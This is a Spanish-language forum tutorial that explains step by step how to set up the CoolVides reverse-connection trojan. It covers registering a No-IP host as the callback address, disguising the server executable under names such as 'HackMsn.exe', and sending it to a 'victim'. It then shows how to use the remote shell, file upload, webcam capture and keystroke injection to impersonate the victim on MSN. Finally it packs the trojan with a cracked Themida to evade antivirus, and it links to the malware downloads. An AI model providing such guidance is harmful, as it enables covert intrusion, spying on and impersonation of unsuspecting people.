Como Configurar un troyano, y Hacedlo INDETECTABLE \..By Tebi../

Bueno, voi hacer este manual de como configurar un troyano de conesion inversa para la gente ke
quiera aprender...y todo eso ( no se mucho pero algo se) ya que sepoco, me gustaria compartirlo con los demas
Weno, Para ello vamos a usar el troyano llamado CoolVides 0.4,el No-ip, y el Themilla
Bueno procedamos

El manual esta dividido en varios Pasos .

+[[ 1º Paso (Link de descargas) ]] :

Nos bajamos los siguientes programas:

-Themilla http://rapidshare.com/files/34845515/Themida.1.8.5.5.Full.zip

-CoolVides 0.4 (El troyano) http://rapidshare.com/files/34846108/CoolVides_0.4.zip

-No-Ip http://rapidshare.com/files/34846432/ducsetup.rar

Bueno una vez descargado estos archivos , enpezaremos a configurar todo


+[[ 2º Paso (Regristarnos) ]] :

- Entramos en www.no-ip.com . Una vez dentro Buscas...Sing up NOW!!, Rellenas los datos, le das a accept .Cuando
termines revisa tu correo y el correo no deseado tambien por si acaso. Te enviaran un link para activar tu cuenta
, una vez astivada tu cuenta nos vamos de nuevo a... www.no-ip.com nos logeamos

Le damos a Add en el menu Host/Redirects.Como se ve en la foto

http://img73.*************/img73/4695/manual1cg7.th.png

Una vez dentro hacemos lo que dice en la siguiente foto :

http://img507.*************/img507/8062/manual2ax5.th.png

Luego, cuando termineis de rellenar esos datos, mas abajo te dice Create Host, pulsas ai
Luego te saldra otra ventana diciendo

Add a host
The host elnombre.no-ip.biz se a creado noseke....eso significa que ya se a creado

Una vez echo esto..vamos a instalar el No-ip . Aqui os pongo de nuevo el Link de descarga

http://rapidshare.com/files/34846432/ducsetup.rar

Lo instalais...y cuando termineis os pedira el E-mail Adress cn el que te registraste en no-ip y la contaseña, una vez echo
esto te saldra una cosa asi...

http://img70.*************/img70/3484/manual3bs7.th.png

Bien, una vez echo todo esto , el paso 2 esta echo .


+[[ 3º Paso (Configurarlo) ]] :

**Antes ke nada desastiva el antivirus**

-Es ora de empezar a configurar el troyano,aora teneis que bajaros esto :

http://rapidshare.com/files/34846108/CoolVides_0.4.zip

Eso es el troyano, lo extraemos en Mis Documentos o en el escritorio ( yo lo hice en mis documentos )

Ahora, te metes en la carpeta llamada CoolVides 0.4 .Vamos a Cliente

http://img127.*************/img127/8949/manual4pe6.th.png

Y entramos en CoolVides y te aparecera esto....

http://img112.*************/img112/3984/manual5du5.th.png

Luego de hacer un click en Configurar servidor, te saldra esto

http://img398.*************/img398/9073/manual6bk6.th.png

Bueno os explicare cada cosa...

Ruta: En la ruta teneis que buscar la carpeta dentro de la otra carpeta llamada CoolVides 0.4 , ¿os acordais deque avia una carpeta
llamada Cliente y otra server? Pues teneis que buscar la carpeta llamada Server y pinchar en coolserver ( que es el troyano) si no
lo entendeis muy bien...decidlo

IP/DNS : Weno aqui teneis que poner la direcion del no-ip...la de...ElNombreQueAyasElegido.no-ip.biz la que elegiste

Puerto : Poneis 80

Intentar conectar cada ** Segundos : Dejais 10 Segundos

Nombre : Poned Victima o Victima1 XD enverdad eso da igual el nombre que le pongas

Aora viene Copiar archivo teneis que marcar esa pestañita y cambiarle el nombre de Coolvi.exe , borrais ese y poneis el siguiente :

"system32dll.exe" Sin las comillas

Cuando termineis de cambiarle el nombre y ponerle ese, kitais de nuevo la V de lo de Copiar archivo

Y luego az click en icono..os saldra esto

http://img73.*************/img73/1155/manual7kv9.th.png

Haceis click en donde pone FileManageIcons, si no os sale 3 carpetas y una se llama asi, pues buscas la carpeta llamada Cliente
dentro de la otra carpeta llamada CoolVides0.4 lo entendeis?xD
Bueno una vez dentro ai te saldran unos..25 iconos, eso es la imagen que tendra el troyano, podeis elegir la que kerais, se puede
cambiar luego

Bueno, haceis click en Guardar Una vez echo esto os vais a la carpeta Server y el coolserver.exe sera el virus, le podeis
cambiar el nombre para que no destaque tanto ejemplo...HackMsn.exe
Luego en el Troyano haceis CLICK DERECHO y le das a "Añadir al archivo..." y selecionais ZIP y luego click en aceptar
Entonces ya tienes el troyano echo, cuando se lo envies a alguien te vas a Clientes y abres el CoolVides y le das a Opciones.
Y teneis que tenerlo como esta en la foto siguiente...

http://img161.*************/img161/5286/manual8vy2.th.png

Luego le dais al botoncito "Guardar" .
Entonces, deves de esperar a que la persona ala que se lo as enviado lo aya ejecutado, cuando lo aya ejecutado te saldra
un mensajito como el del MsN cuando te abla alguien, encima del reloj, Diciendote CoolVides Alert y te dira unos numeritos
y te dira Victima ( o el nombre que le pusiste tu )
Si te sale eso, significa que la victima a sido infectada

Entonces vamos a cliente, abrimos Coolvider.exe y te saldra una ip o unos numeritos, le haces doble click y te saldra un menu con varias opciones
Lo siento, de esto no pude poner foto yaque no me dejaba..una cosa rara :S

Bueno te sale un menu cn varias opciones..Nos vamos a Explorador de Archivos...Clickeamos en Ver unidades, y al lado ai una flechita azul
la pulsamos y te saldran varias opciones y su tamaño en Gb te sale A: C: y D: , por ejemplo..señalamos C: y por ejemplo abajos pones

C:\Archivos de programa\ y si sabes de batch, o algo puedes señalar algun archivo, click derecho y Subir Archivo, y meterle un virus
atraves de Batch, o otras cosas

Bueno aora nos vamos a la pestaña Transferencias y en esta pestañita te dice los archivos enviados y/o descargados a la PC remota, y si
an sido pasado o no y aora volvemos a la pestaña "Explorador de archivos" y hacemos click en...Ir/Actualizar y te dira
el virus que le enviaste..si lo ves, click derecho y ejecutar/abrir normal y ala, el PC remoto infectado XD

Bueno, una opcion tambien interesante es la opcion de Webcam , que puedes echarle fotos a la persona remota xDD

Otra opcion es la de Mensajes, le puedes mandar mensajes de Error a la persona, los puedes configurar tu y poner lo que quieras

En la opcion de regristo podemos ver el registro de qindows de la computadora remota... podemos modificat las claves..agregar y borrar etc xD

pones la ruta y le das a Ver

En la seccion de bromas, ai 4 bromas diferentes.. pulsas la que kieres y le das a enviar XD

Aora te puedes ir a la opcion de Ventanas, y veras lo que tiene abierto la pc remota, te digo que lo mires muy bien, ya que es muy interesante XD
Si tiene una ventana del msn abierta le puedes enviar teclas...le haces click derecho y le das a Enviar teclas muy weno para hacerte pasar por el

aora nos bamos a la pestaña Procesos, que es los ejecutable que tiene el pc remoto abierto como el Control + Alt + Supr XD

puedes..buscar MSNMSGR.EXE , es el msn click derecho y cerrar y ala bb msn

Una opcion tambien muy interesante es el Shall, mas o menos sabreis loque es pero esto es ...un MS-DOS digamos, puedes poner los tipicos codigos
que hace ke le joda la PC a la gente ..como si fuera un .bat para ejecutarlo, le dais a click derecho en la pantallita gris, y le dais a
ejecutar


Bueno...Esto es todo del paso numero 3 el mas jodido y largo, aora pasare a hacer INDETECTABLE el troyano


+[[ 4º Paso y el ultimo POR FIN (Hacedlo INDETECTABLE!!) ]] :

- Bueno... aora toka usar el Themilla , os dejo de nuevo el link de descarga.. http://rapidshare.com/files/34845515/Themida.1.8.5.5.Full.zip

Empezamos...

Lo extraemos, y dentro ai un archivo llamado Themilla

Abrimos el Themida nos saldra esta pantalla :

http://img184.*************/img184/8660/themillakk4.th.jpg

Aora explicare como encriptar el troyano...para que sea indetectable

1ª-Application Information:
Vamos a Input Filename buscamos el server osea, el troyano en la carpeta server,y yasta, pasamos a lo siguiente
Protection Options: Lo dejamos como esta seleccionado por defecto.
Code Replace: Aqui no tokamos nada.
Virtual Machine: Aqui lo dejamos asi , como dice en la foto

http://img115.*************/img115/4734/themilla2iw6.th.jpg

Customized Dialogs: No tocamos nada.
Advanced Options: Aqui cambiamos el nombre donde pone Themida por el system sino cambian eso el server sera mas detectable ante los av.Lo dejamos asi solo marcamos Encript Apliction.

http://img57.*************/img57/8620/themilla3vn0.th.jpg

Bueno, echo esto le damos arriba, a un candadito que dice...Protect, nos saldra dos botoncitos como esta en la foto

http://img124.*************/img124/1089/themilla4et8.th.jpg

que dice uno de ello Close y otro Protect, le damos a Protect
Una vez que se alla cargado todo te saldra Test Protect File y Close, NI SE OS OCURRA PULSAR TEST PROTECT FILE O OS INFECTAREIS VOSOTROS, asi que le damos a close


Bueno dicho esto, Felicidades, As terminado tu troyano Indetectable !!! Gracias por leer este Manual muchas gracias


Echo Por *Tebi* PORFAVOR SI ENCONTRAIS ALGUN ERROR, O SE ME OLVIDO ALGO PORFAVOR DECIDMELO


PD: Soi Tebi

 

Gracias, me lo curre mucho ya lo ire posteando en otras webs

Espero ke os sirva, si tene algun error postearlo plsss thx